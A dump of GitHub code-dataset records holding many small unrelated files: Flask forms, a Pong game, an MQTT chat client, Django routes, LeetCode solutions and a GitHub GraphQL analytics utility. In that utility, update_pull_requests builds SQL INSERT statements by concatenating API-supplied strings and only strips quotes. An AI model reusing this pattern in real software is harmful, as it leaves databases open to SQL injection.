行を追加する\nprint(b)\n\"\"\"\n配列に要素を追加する\nappend(配列, 値, axis=None)\nappend(配列, リスト, axis=None)\nappend(配列, タプル, axis=None)\n\"\"\"\n","repo_name":"natume5/rensyuuyou","sub_path":"python3 Guide note Sample/chapter15/Section15-1/2x3の配列に行を追加する.py","file_name":"2x3の配列に行を追加する.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44318093535","text":"from flask.ext.wtf import Form\nfrom wtforms import StringField, TextAreaField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf.file import FileField, FileRequired, FileAllowed\n\nclass PostForm(Form):\n\ttitle = StringField('title', validators=[DataRequired()])\n\temail = StringField('email')\n\tname = StringField('name')\n\tbody = TextAreaField('body', validators=[DataRequired()])\n\tfile = FileField('file', validators=[FileRequired(), FileAllowed(['jpg', 'jpeg', 'png', 'gif'])])\n\t\nclass ReplyForm(Form):\n\ttitle = StringField('title')\n\temail = StringField('email')\n\tname = StringField('name')\n\tbody = TextAreaField('body', validators=[DataRequired()])\n\tfile = FileField('file', validators=[FileAllowed(['jpg', 'jpeg', 'png', 'gif'])])\n","repo_name":"bobquest33/imageboard","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39635564719","text":"from mock import Mock\nfrom nose.tools import assert_equal\n\nfrom ..common import RPCClientProxy, Call\n\nclass TestRPCClientProxy(object):\n def test_calling(self):\n c = Mock()\n sc = RPCClientProxy(client=c)\n sc.foo(1, bar=2)\n call = c.call.call_args[0][0]\n assert_equal((call.args, call.kwargs), ((1, ), {\"bar\": 2}))\n\n def test_repr(self):\n c = Mock()\n sc = RPCClientProxy(client=c)\n assert_equal(\n repr(sc.prefix),\n \"<RPCClientProxy client=%r prefix='prefix'>\" %(c, )\n )\n\nclass TestCall(object):\n def test_repr(self):\n c = Call(\"foo\", kwargs={\"stuff\": 42})\n assert_equal(\n repr(c),\n \"Call('foo', kwargs={'stuff': 42})\",\n )\n","repo_name":"taavi/dirt","sub_path":"dirt/rpc/tests/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71861826473","text":"from turtle import Screen\nfrom table import Table\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import Scoreboard\nimport time\n\n\nscreen = Screen()\nscreen.setup(width=800, height=400)\nscreen.title(\"Pong Game\")\nscreen.bgcolor(\"black\")\nscreen.tracer(0)\n\ntable = Table()\nr_paddle = Paddle((380, 0))\nl_paddle = Paddle((-380, 0))\nball = Ball()\nscoreboard = Scoreboard()\n\n\nscreen.listen()\nscreen.onkey(r_paddle.up, \"Up\")\nscreen.onkey(r_paddle.down, \"Down\")\nscreen.onkey(l_paddle.up, \"w\")\nscreen.onkey(l_paddle.down, \"s\")\n\n\nis_game_on = True\nwhile is_game_on:\n time.sleep(0.1)\n screen.update()\n ball.start_move()\n\n # Detect collision with wall.\n if ball.ycor() > 180 or ball.ycor() < -180:\n ball.bounce_y()\n\n # Detect collision with paddle.\n if ball.distance(r_paddle) < 30 or ball.distance(l_paddle) < 30:\n ball.bounce_x()\n\n # Detect collision with right miss.\n if ball.xcor() > 390:\n ball.reset_position()\n scoreboard.l_point()\n\n # Detect collision with left miss.\n if ball.xcor() < -390:\n ball.reset_position()\n scoreboard.r_point()\n\n\nscreen.exitonclick()\n","repo_name":"AbdulMuhaimin-1/Python_Intermediate","sub_path":"pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"72278507114","text":"from manejoCliente import Cliente\nfrom manejoCliente import InvalidUser\nfrom manejoCliente import Seleccion_invalida\nimport logging\nfrom globals import *\n\n#JDCP A MI ME TOCO TCP POR ESO NO HAY MUCHOS COMENTARIOS DE MI PARTE EN ESTE CODIGO XD\n#JICM A MI ME TOCO MANEJO DE INSTRUCCIONES, POR ESO TAMPOCO MUCHOS COMENTARIOS MIOS EN ESTE CODIGO XD\n\n#DAHM Constantes a utilizar en la interfaz importadas de globals.py\ngrupo = GROUP_ID\naudio = FILENAME\n\n#DAHM Creacion de instancia de la clase Cliente la cual tiene ya todos los argumentos por defecto importados de globals.py\nuser = Cliente()\n#DAHM Se configura para que se pueda conectar a un broker MQTT\nuser.configMQTT()\n#DAHM Se conecta al broker\nuser.conectar()\n#DAHM Se subscribe a los topicos detectados de los .txt\nuser.subscripcion()\n\n#DAHM El metodo topicos retorna una lista de tuplas con los topicos y el QoS entonces lo desplegamos al inicio del menu\ndestinos = user.topicos()\nlogging.info(('---------- TOPICOS A LOS QUE SE ESTA SUBSCRITO -------- '))\nfor destino in destinos:\n #DAHM Desplegamos solo el primer argumento ya que a un usuario final no le interesa el QoS, de esta manera\n #DAHM el usuario sabe de donde puede recibir mensajes o audios \n logging.info((destino[0]))\n\ntry:\n while True:\n opcion1 = input('1) Enviar texto\\n2) Enviar mensaje de voz\\n')\n try:#JDCP VERIFICA QUE SE INGRESE UNA OPCION CORRECTA , EN CASO CONTRARIO REINICIA EL PROGRAMA\n if opcion1 == '1':\n opcion2 = input('a. Enviar a usuario\\nb. Enviar a sala\\n')\n if opcion2 == 'a':\n #JICM levantar excepcion si el usuario es invalido\n try:\n usuario = input('A que usuario desea enviar el mensaje?\\n')\n int(usuario)\n if len(usuario)!=9:\n raise InvalidUser\n mensaje = input('Escriba su mensaje:\\n')\n user.publicar('usuarios/' + usuario, mensaje)\n #JICM manejo de la excepción si el usuario es invalido, para que se reinicie el programa\n #en vez de cerrarse por completo \n except (InvalidUser, ValueError):\n logging.error('el usuario debe de ser de 9 números')\n\n elif opcion2 == 'b':\n sala = input('A que sala desea enviar el mensaje?\\n')\n #JDCP ESTO VERIFICA QUE EL FORMATO DE LA SALA INGRESADA SEA VALIDA\n try:\n #JDCP SE VERIFICA QUE ESTE INGRESANDO UN NUMERO Y NO LETRAS \n if(sala.isdigit()):\n mensaje = input('Escriba su mensaje:\\n')\n user.publicar('salas/' + grupo + '/S' + sala, mensaje)\n else:\n raise Seleccion_invalida\n #JDCP SI EL USUARIO COMETE EL ERROR DE INGRESAR CARACTERES NO NUMERICOS\n except (Seleccion_invalida,ValueError):\n logging.error('solo se admiten valores numericos en la direccion de la sala \\n')\n else:\n raise Seleccion_invalida\n \n\n elif opcion1 == '2':\n opcion2 = input('a. Enviar a usuario\\nb. Enviar a sala\\n')\n if opcion2 == 'a':\n #JICM levantar excepción si el usuario es invalido\n try:\n #JDCP LE DICE AL USUARIO QUE INGRESE LOS PARAMETROS DEL AUDIO\n usuario = input('A que usuario desea enviar el audio?\\n')\n int(usuario)\n if (len(usuario)!=9):\n raise InvalidUser\n duracion = input('Ingrese duracion del audio: \\n')\n #JDCP hilo para grabar y enviar\n user.hilo_enviarAudio(audio, duracion, usuario)\n #JICM manejo de la excepción si el usuario es invalido, para que se reinicie el programa\n #en vez de cerrarse por completo\n except (InvalidUser, ValueError):\n logging.error('el usuario debe de ser de 9 números')\n\n elif opcion2 == 'b':\n try:\n sala = input('A que sala desea enviar el audio?\\n')\n if (sala.isdigit()):\n duracion = input('Ingrese duracion del audio: \\n')\n #JICM se configura para que envíe correctamente a las salas\n user.hilo_enviarAudio(audio, duracion,\"S\"+sala)\n else:\n raise Seleccion_invalida\n #JDCP SI EL USUARIO COMETE EL ERROR DE INGRESAR CARACTERES NO NUMERICOS\n except (Seleccion_invalida,ValueError):\n logging.error('solo se admiten valores numericos en la direccion de la sala \\n')\n else:\n raise Seleccion_invalida\n \n else:\n #JDCP LEVANTA ERRO SI EL USUARIO NO SELECCIONA LA OPCIONES PROPUESTAS\n raise Seleccion_invalida\n except (Seleccion_invalida,ValueError):\n #JDCP SE MUESTRA AL USUARIO QUE HA INGRESADO UN DATO INVALIDO\n logging.error('data invalido, Ingrese una de las siguiente opciones : \\n')\n\n#DAHM El usuario solo puede finalizar el programa con interrupcion ctrl+c\nexcept KeyboardInterrupt:\n #DAHM Se llama el metodo que desconecta del broker MQTT a la instancia\n user.desconectar()\n logging.info('desconectado del broker!')","repo_name":"usac201700386/parcial2","sub_path":"cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12035298532","text":"from django.urls import path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"listings/create\", views.create_listing, name=\"create_listing\"),\n path(\"listings/<int:listing_id>\", views.display_listing, name=\"display_listing\"),\n path(\"listings/<int:listing_id>/close\", views.close_listing, name=\"close_listing\"),\n path(\"watchlist/<int:listing_id>\", views.add_to_watchlist, name=\"add_to_watchlist\"),\n path(\"watchlist\", views.watchlist, name=\"watchlist\"),\n path(\"category\", views.category, name=\"category\"),\n path(\"category/<str:category>\", views.display_listing_category, name=\"display_listing_category\")\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"jameshnl232/CS50-Web-programming-with-Python-and-JavaScript","sub_path":"commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13355620480","text":"import os\n\nimport PIL.Image as Image\nimport numpy as np\n\nfrom paddle.io import Dataset\n\n\nclass Reader(Dataset):\n def __init__(self, data_path, is_val: bool = False):\n \"\"\"\n 数据读取器\n :param data_path: 数据集所在路径\n :param is_val: 是否为评估模式\n \"\"\"\n super().__init__()\n self.data_path = data_path\n # 因为数据集中图片的文件名是纯数字形式,这里不必去获取文件夹下的图片,直接使用range生成即可\n self.img_list = [str(i) + \".jpg\" for i in range(1, 800)]\n\n # 打开存放label数据的文件\n with open(os.path.join(data_path, \"label_dict.txt\"), 'r') as f:\n self.label_list = eval(f.read())\n\n # 划分数据集 - 该步骤可以重新设计逻辑,传入不同的路径来代表读取的数据集更佳,但因为本次数据集训练集和验证集咋同一个文件夹,故在此进行分割\n self.img_list = self.img_list[:500] if not is_val \\\n else self.img_list[500:800]\n\n def __getitem__(self, index):\n \"\"\"\n 获取一组数据\n :param index: 文件索引号\n :return:\n \"\"\"\n # 第一步打开图像文件并获取label值\n img_path = os.path.join(self.data_path, self.img_list[index])\n img = Image.open(img_path)\n img = np.array(img, dtype=\"float32\").flatten()\n img /= 255\n label = self.label_list[self.img_list[index]]\n label = np.array([label], dtype=\"int64\")\n return img, label\n\n def print_sample(self, index: int = 0):\n print(\"文件名\", self.img_list[index], \"\\t标签值\", self.label_list[self.img_list[index]])\n\n def __len__(self):\n return len(self.img_list)\n\n\nclass InferReader(Dataset):\n def __init__(self, dir_path=None, img_path=None):\n \"\"\"\n 数据读取Reader(推理)\n :param dir_path: 推理对应文件夹(二选一)\n :param img_path: 推理单张图片(二选一)\n \"\"\"\n super().__init__()\n if dir_path:\n # 获取文件夹中所有图片路径\n self.img_names = [i for i in os.listdir(dir_path) if os.path.splitext(i)[1] == \".jpg\"]\n self.img_paths = [os.path.join(dir_path, i) for i in self.img_names]\n elif img_path:\n self.img_names = [os.path.split(img_path)[1]]\n self.img_paths = [img_path]\n else:\n raise Exception(\"请指定需要预测的文件夹或对应图片路径\")\n\n def get_names(self):\n \"\"\"\n 获取推理文件名顺序\n \"\"\"\n return self.img_names\n\n def __getitem__(self, index):\n # 获取图像路径\n file_path = self.img_paths[index]\n # 使用Pillow来读取图像数据并转成Numpy格式\n img = Image.open(file_path)\n img = np.array(img, dtype=\"float32\").flatten() / 255\n return img\n\n def __len__(self):\n return len(self.img_paths)\n\n\nif __name__ == '__main__':\n DATA_PATH = \"/Users/zhanghongji/PycharmProjects/CaptchaDataset/Classify_Dataset\"\n Reader(DATA_PATH).print_sample(1)\n","repo_name":"GT-ZhangAcer/CaptchaDataset","sub_path":"Classify_Module/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"28483887264","text":"# https://leetcode.com/problems/maximum-sum-of-two-non-overlapping-subarrays/description/\n\nclass Solution:\n def maxSumTwoNoOverlap(self, nums: List[int], firstLen: int, secondLen: int) -> int:\n nums.append(0)\n first = []\n second = []\n \n l1, r1 = 0, firstLen\n l2, r2 = 0, secondLen\n sum1, sum2 = sum(nums[:firstLen]), sum(nums[:secondLen])\n \n while r1 < len(nums) or r2 < len(nums):\n if r1 < len(nums):\n first.append((sum1, l1, r1 - 1))\n sum1 -= nums[l1]\n sum1 += nums[r1]\n l1 += 1\n r1 += 1\n \n if r2 < len(nums):\n second.append((sum2, l2, r2 - 1))\n sum2 -= nums[l2]\n sum2 += nums[r2]\n l2 += 1\n r2 += 1\n \n first.sort(reverse=True)\n second.sort(reverse=True)\n \n @cache\n def findMax(idx1, idx2):\n if idx1 >= len(first) or idx2 >= len(second):\n return -1\n \n if second[idx2][1] <= first[idx1][1] <= second[idx2][2]:\n return max(findMax(idx1 + 1, idx2), findMax(idx1, idx2 + 1))\n \n if first[idx1][1] <= second[idx2][1] <= first[idx1][2]:\n return max(findMax(idx1 + 1, idx2), findMax(idx1, idx2 + 1))\n \n return first[idx1][0] + second[idx2][0]\n \n return findMax(0, 0)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_48/max-sum-of-two-non-overlapping-subarrays.py","file_name":"max-sum-of-two-non-overlapping-subarrays.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8692446476","text":"import os\n\ndef gradingStudents(grades):\n # Write your code here\n l =[]\n for i in grades :\n if i < 38 :\n l.append(i)\n else :\n x=i\n c=0\n while not (x%5 == 0):\n x+=1\n c+=1\n if c <=2 :\n l.append(x)\n else :\n l.append(i)\n return (l)\n\n\ngrades_count = int(input().strip())\n\ngrades = []\n\nfor _ in range(grades_count):\n grades_item = int(input().strip())\n grades.append(grades_item)\n\nresult = gradingStudents(grades)\n\nprint ('\\n'.join(map(str, result)))\n\n","repo_name":"wondmD/CSEC_CPD-solutions","sub_path":"grading Students.py","file_name":"grading Students.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69969061032","text":"import iyzipay\n\noptions = {\n 'api_key': iyzipay.api_key,\n 'secret_key': iyzipay.secret_key,\n 'base_url': iyzipay.base_url\n}\n\nrequest = {\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'paymentId': '1',\n 'conversationData': 'conversation data'\n}\n\nthreeds_payment = iyzipay.ThreedsPayment().create(request, options)\n\nprint(threeds_payment.read().decode('utf-8'))\n","repo_name":"iyzico/iyzipay-python","sub_path":"samples/create_threeds_payment.py","file_name":"create_threeds_payment.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"18036508484","text":"import argparse\nimport json\nimport pandas as pd\nimport sys\nimport os\n\nfrom KineticFittingClass import *\n\nsys.path.append('./../')\nimport FRET_modules.modulesPopulationFitting as PF\n\n# import numpy as np\n# # import matplotlib.pyplot as plt\n# # import pandas as pd\n# # from scipy.optimize import minimize\n# import os\n\n# import sys\n# sys.path.append('./../')\n# import modules.modulesCorrectionFactorsAndPlots as MCF\n# import modules.modulesPopulationFitting as PF\n# import PDA as PDA\n# import PDA_SSEResults as SSE\n# import TwoStateKineticModel as KM2S\n# import PDA_FastDescent as PDA_FD\n\n# See docs for full description of each method\nOPTIMISATION_METHODS = ['EndToEnd', \n 'LogSearch', \n 'Binned', \n 'Burst']\n# LOG_SEARCH_METHODS = ['EndToEnd']\n\nif __name__ == '__main__':\n # Define Parser for CLU\n parser = argparse.ArgumentParser(description='Probability Distribution Analysis for two state kinetic model, including gaussian spreading')\n parser.add_argument('-c','--config_path', help='Path to config file for parameter optimisation, see documentation for details', required=True)\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\",action=\"store_true\")\n \n # Get Arguments\n args = parser.parse_args()\n arg_vars = vars(args)\n \n # Load Config file with optimisation details\n with open(arg_vars['config_path'], \"r\") as config_file:\n CONFIG = json.load(config_file)\n \n # Debug\n if args.verbose:\n print(CONFIG)\n \n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \n # Unpack & Check Config\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n DATA_PATH = CONFIG['DATA_PATH']\n ROOT_DIR = CONFIG['ROOT_DIR']\n GroupFeatureName = CONFIG['GroupFeatureName']\n\n EBinLower = CONFIG['EBinning']['EBinLower']\n EBinUpper = CONFIG['EBinning']['EBinUpper']\n NEBins = CONFIG['EBinning']['NEBins']\n EBins, EBinCentres, _ = PF.getBins(EBinLower,EBinUpper,NEBins)\n\n N_BURST_BINS = CONFIG['N_BURST_BINS']\n\n OPTIMISATION_METHOD = CONFIG['OPTIMISATION_METHOD']\n OPT_OPTIONS = CONFIG['OPT_OPTIONS']\n N0 = CONFIG['N']\n\n # GAUSSIAN_PARAMETERS\n r0 = CONFIG['GAUSSIAN_PARAMETERS']['r0']\n rDeviation = CONFIG['GAUSSIAN_PARAMETERS']['rDeviation']\n gaussianResolution = CONFIG['GAUSSIAN_PARAMETERS']['gaussianResolution']\n\n # Check optimisation method is handled\n assert OPTIMISATION_METHOD in OPTIMISATION_METHODS, \"optimisation method not handled, see documentation for choices and descriptions\"\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n # Read & Optimise Data\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n burst_data = pd.read_csv(DATA_PATH)\n # Group data\n burst_data_grouped = burst_data.groupby(GroupFeatureName)\n\n # Initialise Kinetic Fit Objects\n kineticFitDir = os.path.join(ROOT_DIR, 'fitObjects')\n os.makedirs(kineticFitDir, exist_ok=True)\n kfs = []\n for name, group in burst_data_grouped:\n kf = kineticFitting(rawBurstData=group, EBins=EBins, EBinCentres=EBinCentres, metaData={\n 'group_name': GroupFeatureName, 'group_value': name})\n kfs.append(kf)\n\n # Run various optmisations\n for i, kpair in enumerate([[10, 10], [100, 100], [1000, 1000], [10000, 10000]]):\n\n kf.optimiseBinnedPDA(saveDir=os.path.join(ROOT_DIR, f'{GroupFeatureName}_{name}/initial_pair_{i}'),\n intial_ks=kpair,\n nBurstBins=N_BURST_BINS,\n optimiseMethod='L-BFGS-B',\n optimiseOptions=OPT_OPTIONS,\n kbounds=((5, 5000), (5, 5000)))\n \n # Save kinetic fit object\n with open(os.path.join(kineticFitDir,f'kfObj_{GroupFeatureName}_{name}.pkl'), \"wb\") as f:\n pickle.dump(kf, f)\n","repo_name":"jackent601/FRET_PDA","sub_path":"RunKineticFitting.py","file_name":"RunKineticFitting.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546131997","text":"# Print all sub arrays and get the max sum and ending index TC O(N^2)\n# Kadane's Algorithm TC O(N)\n\nimport logging\nfrom typing import List\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef largestContiguousSubArray(arr: List[int]):\n \"\"\"\n\n :param arr:\n :return:\n\n Kadane's Algo\n TC : O(N)\n SC : O(1)\n \"\"\"\n\n length = len(arr)\n if length < 1:\n return 0\n\n max_so_far = 0\n end_index = -1\n current_max = 0\n\n for index, value in enumerate(arr):\n\n current_max = current_max + value\n\n if max_so_far < current_max:\n max_so_far = current_max\n end_index = index\n\n # Reset the value to 0 if its goes below 0\n if current_max < 0:\n current_max = 0\n\n logging.debug(\"index {} value {} current_max {} and max_so_far {}\".format(\n index, value, current_max, max_so_far\n ))\n\n return max_so_far\n\n\nif __name__ == '__main__':\n a = [-2, -3, 4, -1, -2, 1, 5, -3]\n print(\"1. Maximum contiguous sum is {}\".format(\n largestContiguousSubArray(a)\n ))","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/DynamicProgramming/1Maximumsumsubarray.py","file_name":"1Maximumsumsubarray.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22787107577","text":"class Solution:\r\n def isHappy(self, n: int) -> bool:\r\n return twoPointers(n)\r\n\r\ndef twoPointers(number):\r\n #Time: O(n)\r\n #Space: O(1)\r\n slow = number\r\n fast = squaredDigitsSummed(number)\r\n\r\n while True:\r\n if slow == 1 or fast == 1: return True\r\n elif slow == fast: return False\r\n \r\n slow = squaredDigitsSummed(slow)\r\n fast = squaredDigitsSummed((squaredDigitsSummed(fast)))\r\n \r\ndef hashSet(number):\r\n #Time: O(n)\r\n #Space: O(n)\r\n seen = set() #For detecting duplicates\r\n\r\n while True:\r\n if number in seen:\r\n return False\r\n else:\r\n seen.add(number)\r\n number = squaredDigitsSummed(number)\r\n if number == 1: return True\r\n\r\ndef squaredDigitsSummed(number):\r\n output = 0\r\n\r\n for char in str(number):\r\n output += int(char) ** 2\r\n \r\n return output","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Easy/0202-Happy-Number.py","file_name":"0202-Happy-Number.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15177960981","text":"'''Borrowed utils file from Elisabeth Shah'''\nfrom datetime import datetime\nfrom decouple import config\nimport pandas as pd\nimport os\nimport requests\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom api.models import DB, Repo\nfrom api.queries import repo_query, initial_PR_query, cont_PR_query\n#Set secret and url for graph api, set date and seconds per hour for later\nSECRET = config('SECRET')\nURL = 'https://api.github.com/graphql'\nDATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'\nSECS_PER_HOUR = 3600\n#Querying the api for the user and repo requested\ndef run_query(query, variables):\n r = requests.post(URL,\n headers={'Authorization': 'token ' + SECRET, },\n json={'query': query,\n 'variables': variables\n })\n return r\n\n#Pull in the repo and organize the data\ndef pull_repo(owner, name):\n variables = {'owner': owner, 'name': name}\n response = run_query(repo_query, variables)\n data = response.json()['data']['repository']\n\n data['repoName'] = data['name']\n data['stars'] = data['stars']['totalCount']\n data['owner'] = data['owner']['login']\n data['primaryLanguage'] = data['primaryLanguage']['name']\n data['totalIssues'] = data['totalIssues']['totalCount']\n data['openIssues'] = data['openIssues']['totalCount']\n data['closedIssues'] = data['closedIssues']['totalCount']\n data['totalPRs'] = data['totalPRs']['totalCount']\n data['openPRs'] = data['openPRs']['totalCount']\n data['mergedPRs'] = data['mergedPRs']['totalCount']\n data['closedPRs'] = data['closedPRs']['totalCount']\n data['vulnerabilityAlerts'] = data['vulnerabilityAlerts']['totalCount']\n\n if (data['mergedPRs'] + data['closedPRs'] != 0):\n data['PRacceptanceRate'] = data['mergedPRs'] / (data['mergedPRs'] +\n data['closedPRs'])\n else:\n data['PRacceptanceRate'] = None\n data['createdAt'] = datetime.strptime(data['createdAt'],\n DATE_FORMAT)\n data['updatedAt'] = datetime.strptime(data['updatedAt'],\n DATE_FORMAT)\n data['ageInDays'] = (datetime.now().date() -\n data['createdAt'].date()).days\n data['starsPerDay'] = data['stars'] / data['ageInDays']\n data['forksPerDay'] = data['forks'] / data['ageInDays']\n data['PRsPerDay'] = data['totalPRs'] / data['ageInDays']\n data['issuesPerDay'] = data['totalIssues'] / data['ageInDays']\n\n return data\n\n#Summarize information contained within df\ndef summarize_PRs(pr_df):\n data = {}\n pr_df = pd.DataFrame(pr_df, index=[0])\n if pr_df.empty:\n data['uniquePRauthors'] = 0\n data['medianOpenPRhrsAge'] = None\n data['medianPRhrsToClose'] = None\n data['medianPRhrsToMerge'] = None\n else:\n #pr_df['author'] = [author.get('login') if author is not None else ''\n # for author in pr_df['author']]\n pr_df['createdAt'] = pd.to_datetime(pr_df['createdAt'],\n format=DATE_FORMAT)\n pr_df['closedAt'] = pd.to_datetime(pr_df['closedAt'],\n format=DATE_FORMAT)\n\n data['uniquePRauthors'] = pr_df['author'].nunique()\n\n openPRs = pr_df['state'] == 'OPEN'\n if openPRs.empty:\n data['medianOpenPRhrsAge'] = None\n else:\n openPRsecsAge = (datetime.now() -\n pr_df['createdAt']).dt.total_seconds()[openPRs]\n data['medianOpenPRhrsAge'] = openPRsecsAge.median()/SECS_PER_HOUR\n\n closedPRs = pr_df['state'] == 'CLOSED'\n if closedPRs.empty:\n data['medianPRhrsToClose'] = None\n else:\n PRsecsToClose = (pr_df['closedAt'] -\n pr_df['createdAt']).dt.total_seconds()[closedPRs]\n data['medianPRhrsToClose'] = PRsecsToClose.median()/SECS_PER_HOUR\n\n mergedPRs = pr_df['state'] == 'MERGED'\n if mergedPRs.empty:\n data['medianPRhrsToMerge'] = None\n else:\n PRsecsToMerge = (pr_df['closedAt'] -\n pr_df['createdAt']).dt.total_seconds()[mergedPRs]\n data['medianPRhrsToMerge'] = PRsecsToMerge.median()/SECS_PER_HOUR\n\n return data\n\n\ndef add_or_update_repo(owner, name, app):\n repo_dict = pull_repo(owner, name)\n\n variables = {'owner': owner, 'name': name}\n response = run_query(initial_PR_query, variables)\n data = response.json()['data']\n df = pd.DataFrame.from_records(data['repository']['pullRequests']['nodes'])\n\n i = 0\n while data['repository']['pullRequests']['pageInfo']['hasNextPage']:\n i += 1\n yield 'Processing PRs {} to {} - '.format((i-1)*50, i*50)\n cursor = data['repository']['pullRequests']['pageInfo']['endCursor']\n variables['cursor'] = cursor\n response = run_query(cont_PR_query, variables)\n yield 'cursor {}.<br>'.format(cursor)\n data = response.json()['data']\n df = df.append(pd.DataFrame.from_records(\n data['repository']['pullRequests']['nodes']))\n\n pr_dict = summarize_PRs(df)\n repo_dict.update(pr_dict)\n\n db_repo = Repo(owner=repo_dict['owner'],\n name=repo_dict['name'],\n description=repo_dict['description'],\n primary_language=repo_dict['primaryLanguage'],\n created_at=repo_dict['createdAt'],\n updated_at=repo_dict['updatedAt'],\n disk_usage=repo_dict['diskUsage'],\n stars=repo_dict['stars'],\n forks=repo_dict['forks'],\n total_issues=repo_dict['totalIssues'],\n open_issues=repo_dict['openIssues'],\n closed_issues=repo_dict['closedIssues'],\n total_PRs=repo_dict['totalPRs'],\n open_PRs=repo_dict['openPRs'],\n merged_PRs=repo_dict['mergedPRs'],\n closed_PRs=repo_dict['closedPRs'],\n vulnerabilities=repo_dict['vulnerabilityAlerts'],\n unique_PR_authors=repo_dict['uniquePRauthors'],\n PR_acceptance_rate=repo_dict['PRacceptanceRate'],\n median_open_PR_hrs_age=repo_dict['medianOpenPRhrsAge'],\n median_PR_hrs_to_merge=repo_dict['medianPRhrsToMerge'],\n median_PR_hrs_to_close=repo_dict['medianPRhrsToClose'],\n )\n with app.app_context():\n DB.session.merge(db_repo)\n DB.session.commit()\n yield '{} {} added!'.format(owner, name)\n\n\ndef update_pull_requests(conn, owner, name):\n '''Function takes in data returned from github apiv4\n as well as a postgresSQL connection object and pushes all\n pull requests contained in data to the repository, assuming their\n ids don't already exist'''\n variables = {'owner': owner, 'name': name}\n response = run_query(initial_PR_query, variables)\n data = response.json()['data']['repository']['pullRequests']['nodes']\n curs = conn.cursor()\n for i in range(len(data)):\n insert = (\"INSERT INTO PullRequests VALUES (\" +\n \"'\" + str(variables['name']) +\"'\" + \", \" +\n \"'\" + str(variables['owner']) +\"'\" + \", \" + \n \"'\" + str(data[i]['id']) +\"'\" + \", \" +\n \"'\" + str(data[i]['state']) +\"'\" + \", \" + \n \"'\" + str(data[i]['createdAt']) + \"'\" + \", \" +\n \"'\" + str(data[i]['closedAt']) + \"'\" + \", \" +\n \"'\" + str(data[i]['title'].replace(\"'\",\"\")) +\"'\" + \", \" + \n \"'\" + str(data[i]['bodyText'].replace(\"'\",\"\")) +\"'\" + \", \" +\n \"'\" + str(data[i]['author']['login']) +\"'\" + \", \" + \n \"'\" + str(data[i]['participants']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['comments']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['reactions']['totalCount'])+\"'\" + \", \" +\n \"'\" + str(data[i]['commits']['totalCount']) +\"'\" + \", \" + \n \"'\" + str(data[i]['changedFiles']) +\"'\" + \", \" +\n \"'\" + str(data[i]['additions']) +\"'\" + \", \" + \n \"'\" + str(data[i]['deletions']) + \"'\" + \") ON CONFLICT (ID) DO NOTHING\")\n curs.execute(insert)\n \n conn.commit()\n\nlemm = WordNetLemmatizer()\n\ndef lemmatize_text(text):\n #Create list of lemmatized words, return original sentences\n lemms = [lemm.lemmatize(w) for w in text.split()]\n return \" \".join(lemms)\n\ndef sentiment(conn, name):\n \"\"\"Collect commit message text from database\n run simple vader sentiment analysis and use\n 